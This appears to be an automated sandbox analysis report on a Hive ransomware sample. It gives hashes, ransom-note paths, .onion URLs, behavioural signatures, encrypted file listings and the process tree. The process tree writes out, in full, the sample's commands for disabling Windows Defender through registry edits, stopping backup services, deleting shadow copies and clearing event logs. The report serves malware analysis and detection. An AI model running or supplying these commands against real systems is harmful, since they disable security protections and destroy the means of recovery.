Analysis
- max time kernel: 119s
- max time network: 185s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 05-01-2022 13:28
- Static task: static1
- Behavioral task: behavioral1
- Sample: 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe
- Resource: win7-en-20211208
General
- Target: 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe
- Size: 3.9MB
- MD5: 0e4d44dde522c07d09d9e3086cfae803
- SHA1: d8dc26e2094869a0da78ecb47494c931419302dc
- SHA256: 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
- SHA512: ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06
Malware Config
Extracted
- Path: C:\Program Files\7-Zip\n8pw_HOW_TO_DECRYPT.txt
- Family: hive
- URLs:
  - http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
  - http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
- Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
  Uses mpcmdrun utility to delete all AV definitions.
  Processes: MpCmdRun.exe (PID 3516)
- Hive
  A ransomware written in Golang first seen in June 2021.
- Modifies security service (2 TTPs, 1 IoC)
  Processes: reg.exe
  - Set value (int): \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"
- Clears Windows event logs (1 TTP)
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  Processes: bcdedit.exe (PID 988), bcdedit.exe (PID 568)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Drops file in Program Files directory (64 IoCs)
  Process: 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe (every entry below)
  - File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailWideTile.scale-400.png
  - File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\PersonalPipcDemoR_BypassTrial365-ppd.xrm-ms.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj
  - File opened for modification: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GamesXboxHubLargeTile.scale-125_contrast-high.png
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.Awards\Assets\Sign_in_size.jpg
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Microsoft.Apps.People.BackgroundTasks.winmd
  - File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_SubTest-ul-oob.xrm-ms.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_EAAAABAAAAA0.cv2gj
  - File opened for modification: C:\Program Files\Microsoft Office\root\rsod\proof.es-es.msi.16.es-es.boot.tree.dat.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj
  - File opened for modification: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\MS.POWERPNT.16.1033.hxn.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_NAAAADQAAAA0.cv2gj
  - File created: C:\Program Files\Microsoft Office\root\Office16\MSIPC\ja\n8pw_HOW_TO_DECRYPT.txt
  - File opened for modification: C:\Program Files\Microsoft Office\root\Office16\FPA_f4\FA000000005.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemePreview\CardBacks\Western.png
  - File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-96.png
  - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\cstm_brand_preview2x.png.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj
  - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nb-no\ui-strings.js.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj
  - File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-tw\n8pw_HOW_TO_DECRYPT.txt
  - File opened for modification: C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_COL.HXT.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\pg_60x42.png
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\km_16x11.png
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-150_contrast-white.png
  - File opened for modification: C:\Program Files\7-Zip\Lang\sv.txt.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Autumn\mask\13c.png
  - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\tool-search-2x.png.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj
  - File opened for modification: C:\Program Files\Microsoft Office\root\Office16\1033\Client2019_eula.txt.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Workflow\Icon_Layout.png
  - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ar-ae\ui-strings.js.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj
  - File created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pl-pl\n8pw_HOW_TO_DECRYPT.txt
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\News\news_bottom.jpg
  - File opened for modification: C:\Program Files\Microsoft Office\root\vfs\Fonts\private\GADUGI.TTF.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_IAAAACAAAAA0.cv2gj
  - File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\6584_24x24x32.png
  - File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7989_20x20x32.png
  - File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Google.scale-200.png
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\FileIcons\FileLogoExtensions.targetsize-40.png
  - File opened for modification: C:\Program Files\Common Files\microsoft shared\ink\fr-FR\TipTsf.dll.mui
  - File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_MAK-ppd.xrm-ms.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj
  - File opened for modification: C:\Program Files\Microsoft Office\root\Office16\AugLoop\third-party-notices.txt.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\198.png
  - File created: C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\n8pw_HOW_TO_DECRYPT.txt
  - File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_CAAAAAgAAAA0.cv2gj
  - File opened for modification: C:\Program Files\Microsoft Office\root\Templates\1033\Pitchbook.potx.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_MgAAADIAAAA0.cv2gj
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\heidy.png
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\SmallTile.scale-100.png
  - File opened for modification: C:\Program Files\Microsoft Office\root\Office16\MSIPC\sr-Cyrl-BA\msipc.dll.mui.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_PAAAADwAAAA0.cv2gj
  - File opened for modification: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-white\LargeTile.scale-125.png
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.WindowsMaps_2017.209.105.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml
  - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\new_icons.png.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-36_contrast-black.png
  - File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Trial2-ppd.xrm-ms.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_PAAAADwAAAA0.cv2gj
  - File opened for modification: C:\Program Files\Microsoft Office\root\Office16\1033\GRAPH_COL.HXT.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\PeopleWideTile.scale-100.png
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\bf_16x11.png
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\xaml\onenote\CaptureUIStyles.xaml
  - File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\8577_32x32x32.png
  - File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarSplashLogo.scale-150.png
  - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\cross.png.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj
  - File opened for modification: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\GenericMailMediumTile.scale-400.png
  - File opened for modification: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\ui-strings.js.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_GAAAABgAAAA0.cv2gj
  - File opened for modification: C:\Program Files\Java\jdk1.8.0_66\jre\lib\currency.data.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj
  - File opened for modification: C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2017.125.40.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraMedTile.scale-200.png
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\69.png
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-36_contrast-white.png
  - File opened for modification: C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-72_altform-colorize.png
  - File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core_2.3.0.v20131211-1531.jar.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_OAAAADgAAAA0.cv2gj
  - File opened for modification: C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.nl_zh_4.4.0.v20140623020002.jar.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AgAAAAIAAAA0.cv2gj
  - File opened for modification: C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_MAK_AE-pl.xrm-ms.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj
- Launches sc.exe
  Sc.exe is a Windows utility to control services on the system.
- Interacts with shadow copies (2 TTPs, 1 IoC)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes: vssadmin.exe (PID 3180)
- Modifies registry class (3 IoCs)
  Processes: reg.exe, reg.exe, reg.exe
  - Key deleted: \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP
  - Key deleted: \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP
  - Key deleted: \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP
- Opens file in notepad (likely ransom note) (1 IoC)
  Processes: notepad.exe (PID 3160)
- Runs net.exe
- Runs ping.exe (1 TTP, 1 IoC)
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes: powershell.exe (PID 2820, 3 entries), powershell.exe (PID 3904, 3 entries), 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe (PID 2512, 2 entries)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes: wevtutil.exe, wevtutil.exe, wevtutil.exe, wmic.exe, wmic.exe
  - wevtutil.exe (PID 3692): SeSecurityPrivilege, SeBackupPrivilege
  - wevtutil.exe (PID 3580): SeSecurityPrivilege, SeBackupPrivilege
  - wevtutil.exe (PID 1800): SeSecurityPrivilege, SeBackupPrivilege
  - wmic.exe (PID 1480): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  - wmic.exe (PID 3116): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  - wmic.exe (PID 3116, second set of entries): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe, net.exe (9 instances)
  Each source/target pair below is recorded twice in the report (64 entries in total).
  - PID 2512 (33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe) wrote to memory of:
    - PID 3704 (net.exe)
    - PID 1524 (net.exe)
    - PID 572 (net.exe)
    - PID 2360 (net.exe)
    - PID 2248 (net.exe)
    - PID 3336 (net.exe)
    - PID 840 (net.exe)
    - PID 1416 (net.exe)
    - PID 2528 (net.exe)
    - PID 1668 (sc.exe)
    - PID 2236 (sc.exe)
    - PID 1320 (sc.exe)
    - PID 1224 (sc.exe)
    - PID 4012 (sc.exe)
    - PID 1376 (sc.exe)
    - PID 1656 (sc.exe)
    - PID 2024 (sc.exe)
    - PID 1980 (sc.exe)
    - PID 2200 (reg.exe)
    - PID 3940 (reg.exe)
    - PID 3232 (reg.exe)
    - PID 352 (reg.exe)
    - PID 1272 (reg.exe)
  - PID 3704 (net.exe) wrote to memory of PID 3280 (net1.exe)
  - PID 1524 (net.exe) wrote to memory of PID 1296 (net1.exe)
  - PID 572 (net.exe) wrote to memory of PID 1164 (net1.exe)
  - PID 2360 (net.exe) wrote to memory of PID 2088 (net1.exe)
  - PID 2248 (net.exe) wrote to memory of PID 3680 (net1.exe)
  - PID 3336 (net.exe) wrote to memory of PID 4036 (net1.exe)
  - PID 840 (net.exe) wrote to memory of PID 2572 (net1.exe)
  - PID 1416 (net.exe) wrote to memory of PID 584 (net1.exe)
  - PID 2528 (net.exe) wrote to memory of PID 2552 (net1.exe)
Processes
Each entry gives the PID, the image path in parentheses, and the command line; children are indented under their parent, and signature hits are listed beneath the process that triggered them.
- PID 2512 (C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe): "C:\Users\Admin\AppData\Local\Temp\33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe"
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  - PID 3704 (C:\Windows\SYSTEM32\net.exe): net.exe stop "SamSs" /y
    - Suspicious use of WriteProcessMemory
    - PID 3280 (C:\Windows\system32\net1.exe): C:\Windows\system32\net1 stop "SamSs" /y
  - PID 1524 (C:\Windows\SYSTEM32\net.exe): net.exe stop "SDRSVC" /y
    - Suspicious use of WriteProcessMemory
    - PID 1296 (C:\Windows\system32\net1.exe): C:\Windows\system32\net1 stop "SDRSVC" /y
  - PID 572 (C:\Windows\SYSTEM32\net.exe): net.exe stop "SstpSvc" /y
    - Suspicious use of WriteProcessMemory
    - PID 1164 (C:\Windows\system32\net1.exe): C:\Windows\system32\net1 stop "SstpSvc" /y
  - PID 2360 (C:\Windows\SYSTEM32\net.exe): net.exe stop "UI0Detect" /y
    - Suspicious use of WriteProcessMemory
    - PID 2088 (C:\Windows\system32\net1.exe): C:\Windows\system32\net1 stop "UI0Detect" /y
  - PID 2248 (C:\Windows\SYSTEM32\net.exe): net.exe stop "vmicvss" /y
    - Suspicious use of WriteProcessMemory
    - PID 3680 (C:\Windows\system32\net1.exe): C:\Windows\system32\net1 stop "vmicvss" /y
  - PID 3336 (C:\Windows\SYSTEM32\net.exe): net.exe stop "VSS" /y
    - Suspicious use of WriteProcessMemory
    - PID 4036 (C:\Windows\system32\net1.exe): C:\Windows\system32\net1 stop "VSS" /y
  - PID 840 (C:\Windows\SYSTEM32\net.exe): net.exe stop "wbengine" /y
    - Suspicious use of WriteProcessMemory
    - PID 2572 (C:\Windows\system32\net1.exe): C:\Windows\system32\net1 stop "wbengine" /y
  - PID 1416 (C:\Windows\SYSTEM32\net.exe): net.exe stop "WebClient" /y
    - Suspicious use of WriteProcessMemory
    - PID 584 (C:\Windows\system32\net1.exe): C:\Windows\system32\net1 stop "WebClient" /y
  - PID 2528 (C:\Windows\SYSTEM32\net.exe): net.exe stop "UnistoreSvc_1323b" /y
    - Suspicious use of WriteProcessMemory
    - PID 2552 (C:\Windows\system32\net1.exe): C:\Windows\system32\net1 stop "UnistoreSvc_1323b" /y
  - PID 1668 (C:\Windows\SYSTEM32\sc.exe): sc.exe config "SamSs" start= disabled
  - PID 2236 (C:\Windows\SYSTEM32\sc.exe): sc.exe config "SDRSVC" start= disabled
  - PID 1320 (C:\Windows\SYSTEM32\sc.exe): sc.exe config "SstpSvc" start= disabled
  - PID 1224 (C:\Windows\SYSTEM32\sc.exe): sc.exe config "UI0Detect" start= disabled
  - PID 4012 (C:\Windows\SYSTEM32\sc.exe): sc.exe config "vmicvss" start= disabled
  - PID 1376 (C:\Windows\SYSTEM32\sc.exe): sc.exe config "VSS" start= disabled
  - PID 1656 (C:\Windows\SYSTEM32\sc.exe): sc.exe config "wbengine" start= disabled
  - PID 2024 (C:\Windows\SYSTEM32\sc.exe): sc.exe config "WebClient" start= disabled
  - PID 1980 (C:\Windows\SYSTEM32\sc.exe): sc.exe config "UnistoreSvc_1323b" start= disabled
  - PID 2200 (C:\Windows\SYSTEM32\reg.exe): reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - PID 3940 (C:\Windows\SYSTEM32\reg.exe): reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  - PID 3232 (C:\Windows\SYSTEM32\reg.exe): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  - PID 352 (C:\Windows\SYSTEM32\reg.exe): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  - PID 1272 (C:\Windows\SYSTEM32\reg.exe): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  - PID 2096 (C:\Windows\SYSTEM32\reg.exe): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  - PID 3672 (C:\Windows\SYSTEM32\reg.exe): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  - PID 3688 (C:\Windows\SYSTEM32\reg.exe): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  - PID 3588 (C:\Windows\SYSTEM32\reg.exe): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  - PID 2040 (C:\Windows\SYSTEM32\reg.exe): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  - PID 896 (C:\Windows\SYSTEM32\reg.exe): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  - PID 3048 (C:\Windows\SYSTEM32\reg.exe): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  - PID 3864 (C:\Windows\SYSTEM32\reg.exe): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  - PID 3684 (C:\Windows\SYSTEM32\reg.exe): reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  - PID 3900 (C:\Windows\SYSTEM32\reg.exe): reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  - PID 1164 (C:\Windows\SYSTEM32\reg.exe): reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  - PID 788 (C:\Windows\SYSTEM32\schtasks.exe): schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  - PID 1540 (C:\Windows\SYSTEM32\schtasks.exe): schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  - PID 1824 (C:\Windows\SYSTEM32\schtasks.exe): schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  - PID 3312 (C:\Windows\SYSTEM32\schtasks.exe): schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  - PID 3676 (C:\Windows\SYSTEM32\schtasks.exe): schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  - PID 380 (C:\Windows\SYSTEM32\reg.exe): reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:748
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:868
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1088 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3564 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3976 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2592
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1784
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2128
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3004
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:2872 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1640
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3180 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3692 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3580 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1800 -
